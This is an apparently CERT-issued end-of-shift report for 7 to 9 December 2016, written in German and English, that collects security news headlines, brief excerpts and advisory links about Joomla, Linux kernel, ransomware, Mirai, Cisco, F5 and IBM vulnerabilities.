End-of-Shift report
Timeframe: Mittwoch 07-12-2016 18:00 − Freitag 09-12-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
Produktwarnung für Joomla!
[...] In den Joomla! Versionen 3.4.4 bis einschließlich 3.6.4 wurde eine Sicherheitslücke entdeckt, die es einem Angreifer aus dem Internet ermöglicht, beliebigen Programmcode auszuführen und dadurch erheblichen Schaden auf einem betroffenen...
https://www.bsi-fuer-buerger.de/SharedDocs/Warnmeldungen/DE/TW/warnmeldung_tw-t16-0140.html
Root-Rechte durch Linux-Lücke
Seit fünf Jahren klafft eine Lücke im Linux-Kernel, durch die sich lokale Nutzer erhöhte Rechte verschaffen können. Auch Android ist betroffen.
https://heise.de/-3565365
Mobile Ransomware: Pocket-Sized Badness
A few weeks ago, I spoke at Black Hat Europe 2016 on Pocket-Sized Badness: Why Ransomware Comes as a Plot Twist in the Cat-Mouse Game. While watching mobile ransomware from April 2015 to April 2016, I noticed a big spike in the number of Android ransomware samples. During that year, the number of Android ransomware increased by 140%. In certain areas, mobile ransomware accounts for up to 22 percent of mobile malware overall! (These numbers were obtained from the Trend Micro Mobile App...
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/hPA6z0gnzFE/
Managed-Exchange-Dienst: Telekom-Cloud-Kunde konnte fremde Adressbücher einsehen
Durch einen Konfigurationsfehler konnte ein Nutzer der Telekom-Cloud-Dienste kurzzeitig auf fremde Adressbücher zugreifen, darunter sollen auch Strafverfolgungsbehörden gewesen sein. Schuld war wohl ein Berechtigungsfehler im Exchange-Dienst. (Telekom, Datenschutz)
http://www.golem.de/news/managed-exchange-dienst-telekom-cloud-kunde-konnte-fremde-adressbuecher-einsehen-1612-124963-rss.html
Crooks Start Deploying New "August" Infostealer
During the month of November 2016, a cyber-crime group has started deploying a new malware family nicknamed "August," used mainly for information gathering and reconnaissance on the infected targets computer. [...]
https://www.bleepingcomputer.com/news/security/crooks-start-deploying-new-august-infostealer/
PowerShell threats surge: 95.4 percent of analyzed scripts were malicious
Symantec analyzed 111 threat families that use PowerShell, finding that they leverage the framework to download payloads and traverse through networks.
https://www.symantec.com/connect/blogs/powershell-threats-surge-954-percent-analyzed-scripts-were-malicious
Kaspersky Security Bulletin 2016. The ransomware revolution
Between January and September 2016 ransomware attacks on business increased three-fold - to the equivalent of an attack every 40 seconds. With the ransomware-as-a-service economy booming, and the launch of the NoMoreRansom project, Kaspersky Lab has named ransomware its key topic for 2016.
http://securelist.com/analysis/kaspersky-security-bulletin/76757/kaspersky-security-bulletin-2016-story-of-the-year/
Banking Trojan Uses Gmail Popup to Extend Infection to Victims Android Phone
A group of malware authors has come up with a new method of transcending an infection from the users computer to his Android smartphone. [...]
https://www.bleepingcomputer.com/news/security/banking-trojan-uses-gmail-popup-to-extend-infection-to-victims-android-phone/
Industriespionage: Wie Thyssenkrupp seine Angreifer fand
Wie schützt man sein Netzwerk, wenn man 150.000 Mitarbeiter und 500 Tochterunternehmen hat? Thyssenkrupp lernte nach einem Angriff, dass es zwei Dinge braucht: Ausreichend Ressourcen und Freiheit für das Team.
http://www.golem.de/news/industriespionage-wie-thyssenkrupp-seine-angreifer-fand-1612-124988-rss.html
Now Mirai Has DGA Feature Built in
Nearly 2 weeks ago, 2 new infection vectors (aka TCP ports of 7547 and 5555) were found being used to spread MIRAI malwares . My colleague Gensheng quickly set up some honeypots for that sort of vectors and soon had his harvests: 11 samples were captured on Nov 28th. Till now 53 unique samples have been captured by our honeypots from 6 hosting servers.
http://blog.netlab.360.com/new-mirai-variant-with-dga/
Krypto-Trojaner: Lockys gieriger Bruder verlangt über 2000 Euro Lösegeld
Nicht nur der Erpressungs-Trojaner GoldenEye ist derzeit ein Ärgernis, auch die Verwandschaft des berüchtigten Locky-Trojaners geht weiter auf Raubzug. Eine Osiris genannte Variante schlägt derzeit vermehrt zu und verlangt ein saftiges Lösegeld.
https://heise.de/-3564812
Bugtraq: AST-2016-009:
http://www.securityfocus.com/archive/1/539888
Bugtraq: AST-2016-008: Crash on SDP offer or answer from endpoint using Opus
http://www.securityfocus.com/archive/1/539887
DFN-CERT-2016-2010: Sophos UTM: Mehrere Schwachstellen ermöglichen u.a. die Ausführung beliebigen Programmcodes
https://portal.cert.dfn.de/adv/DFN-CERT-2016-2010/
DFN-CERT-2016-1991: FreeBSD: Mehrere Schwachstellen ermöglichen u.a. die Ausführung beliebigen Programmcodes
https://portal.cert.dfn.de/adv/DFN-CERT-2016-1991/
DSA-3729 xen - security update
Multiple vulnerabilities have been discovered in the Xen hypervisor. TheCommon Vulnerabilities and Exposures project identifies the followingproblems:...
https://www.debian.org/security/2016/dsa-3729
Cisco Email Security Appliance Content Filter Bypass Vulnerability
A vulnerability in the content filtering functionality of Cisco AsyncOS Software for Cisco Email Security Appliances could allow an unauthenticated, remote attacker to bypass user filters that are configured for an affected device.The vulnerability is due to improper filtering of certain TAR format files that are attached to email messages. An attacker could exploit this vulnerability by sending an email message that has a crafted TAR file attachment through an affected device.
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161207-esa
F5 Security Advisories
Security Advisory: libxml2 vulnerabilities CVE-2016-4447 and CVE-2016-4449
https://support.f5.com:443/kb/en-us/solutions/public/k/24/sol24322529.html?ref=rss
Security Advisory: PHP vulnerability CVE-2016-6290
https://support.f5.com:443/kb/en-us/solutions/public/k/15/sol15850913.html?ref=rss
Security Advisory: libarchive vulnerability CVE-2016-5844
https://support.f5.com:443/kb/en-us/solutions/public/k/24/sol24036027.html?ref=rss
Security Advisory: PHP vulnerability CVE-2016-7126
https://support.f5.com:443/kb/en-us/solutions/public/k/40/sol40564589.html?ref=rss
Security Advisory: OpenSSL vulnerability CVE-2016-6302
https://support.f5.com:443/kb/en-us/solutions/public/k/70/sol70844615.html?ref=rss
Security Advisory: libxml2 vulnerability CVE-2016-1836
https://support.f5.com:443/kb/en-us/solutions/public/k/48/sol48220300.html?ref=rss
Security Advisory: libarchive vulnerability CVE-2015-8932
https://support.f5.com:443/kb/en-us/solutions/public/k/90/sol90412202.html?ref=rss
Security Advisory: libarchive vulnerability CVE-2016-5418
https://support.f5.com:443/kb/en-us/solutions/public/k/35/sol35246595.html?ref=rss
Security Advisory: libxml2 vulnerability CVE-2016-1835
https://support.f5.com:443/kb/en-us/solutions/public/k/43/sol43314223.html?ref=rss
Security Advisory: libxml2 vulnerability CVE-2016-1837
https://support.f5.com:443/kb/en-us/solutions/public/k/05/sol05937379.html?ref=rss
Security Advisory: libxml2 vulnerability CVE-2016-1833
https://support.f5.com:443/kb/en-us/solutions/public/k/62/sol62030064.html?ref=rss
Security Advisory: libxml2 vulnerability CVE-2016-1762
https://support.f5.com:443/kb/en-us/solutions/public/k/14/sol14338030.html?ref=rss
IBM Security Bulletins
IBM Security Bulletin: Multiple security vulnerabilities affect Liberty for Java for IBM Bluemix (CVE-2016-5573, CVE-2016-5597, CVE-2016-5983)
http://www.ibm.com/support/docview.wss?uid=swg21994945
IBM Security Bulletin: IBM i is affected by networking BIND vulnerabilities (CVE-2016-2775, CVE-2016-2776, CVE-2016-8864 and CVE-2016-6170)
http://www.ibm.com/support/docview.wss?uid=nas8N1021750
IBM Security Bulletin: Vulnerabilities in OpenSSL affect Power Hardware Management Console (CVE-2016-2180, CVE-2016-2182, CVE-2016-6306)
http://www.ibm.com/support/docview.wss?uid=nas8N1021733
IBM Security Bulletin: Vulnerabilities in OpenSSL affect IBM Tivoli Network Manager IP Edition 3.9 Fix Pack 4 HTTPS support for Perl Collector
http://www.ibm.com/support/docview.wss?uid=swg21990532
IBM Security Bulletin: Vulnerabilities in DHCP affect Power Hardware Management Console (CVE-2015-8605 and CVE-2016-2774)
http://www-01.ibm.com/support/docview.wss?uid=nas8N1021703
IBM Security Bulletin: Multiple vulnerabilities affect IBM Security AppScan Enterprise
http://www-01.ibm.com/support/docview.wss?uid=swg21995118
IBM Security Bulletin: Open Source Apache Tomcat , Commons FileUpload Vulnerabilities affecting IBM Algo Audit and Compliance (CVE-2016-3092)
http://www.ibm.com/support/docview.wss?uid=swg21993305
IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM Flex System Manager (FSM) Storage Manager Install Anywhere (SMIA) configuration tool
http://www.ibm.com/support/docview.wss?uid=isg3T1024507
IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Network Advisor (CVE-2016-3425, CVE-2016-3427, CVE-2016-0695).
http://www.ibm.com/support/docview.wss?uid=ssg1S1009640
IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM b-type SAN switches and directors and IBM Network Advisor (CVE-2016-0705, CVE-2016-0797, CVE-2016-0799, CVE-2016-0702, CVE-2016-0704, CVE-2016-0704, CVE-2016-2842).
http://www.ibm.com/support/docview.wss?uid=ssg1S1009631
IBM Security Bulletin: Vulnerability in pConsole impacts AIX (CVE-2016-0266)
http://aix.software.ibm.com/aix/efixes/security/pconsole_advisory2.asc
IBM Security Bulletin: Vulnerability in OpenSSL affects IBM Fabric Manager (CVE-2016-2183)
https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099504
IBM Security Bulletin: Vulnerability in Apache Struts affects IBM Social Media Analytics (CVE-2016-4003)
http://www-01.ibm.com/support/docview.wss?uid=swg21994399
IBM Security Bulletin: Apache Commons FileUpload Vulnerability affects IBM Rational ClearQuest (CVE-2016-3092)
http://www-01.ibm.com/support/docview.wss?uid=swg21993816
IBM Security Bulletin:Vulnerabilities in OpenSSL affect IBM SONAS
http://www.ibm.com/support/docview.wss?uid=ssg1S1009648
IBM Security Bulletin: Vulnerabilities in OpenSSL affects IBM Rational ClearCase (CVE-2016-2177, CVE-2016-2178, CVE-2016-2183, CVE-2016-6302, CVE-2016-6303, CVE-2016-6304, CVE-2016-6306)
http://www.ibm.com/support/docview.wss?uid=swg21993514
IBM Security Bulletin: Tivoli Storage Manager (IBM Spectrum Protect) AIX Client Buffer Overflow (CVE-2016-5985)
http://www.ibm.com/support/docview.wss?uid=swg21993695
IBM Security Bulletin: A vulnerability in IBM Websphere affects IBM Tivoli Netcool Configuration Manager (ITNCM) (CVE-2016-5983)
http://www.ibm.com/support/docview.wss?uid=swg21992640
IBM Security Bulletin: Multiple security vulnerabilities affect the Report Builder and Data Collection Component that are shipped with Jazz Reporting Service (CVE-2016-5898, CVE-2016-5899, CVE-2016-6054, CVE-2016-6047)
http://www-01.ibm.com/support/docview.wss?uid=swg21991154
IBM Security Bulletin: Multiple security vulnerabilities affect the Lifecycle Query Engine (LQE) that is shipped with Jazz Reporting Service (CVE-2016-5897, CVE-2016-6039)
http://www-01.ibm.com/support/docview.wss?uid=swg21991153
IBM Security Bulletin:Samba vulnerability issue on IBM Storwize V7000 Unified (CVE-2016-2119)
http://www.ibm.com/support/docview.wss?uid=ssg1S1009567
IBM Security Bulletin:Apache Tomcat vulnerability affects IBM Storwize V7000 Unified (CVE-2016-3092)
http://www.ibm.com/support/docview.wss?uid=ssg1S1009566
IBM Security Bulletin: Vulnerabilities in OpenSSL, OpenVPN and GNU glibc affect IBM Security Virtual Server Protection for VMware
http://www-01.ibm.com/support/docview.wss?uid=swg21995039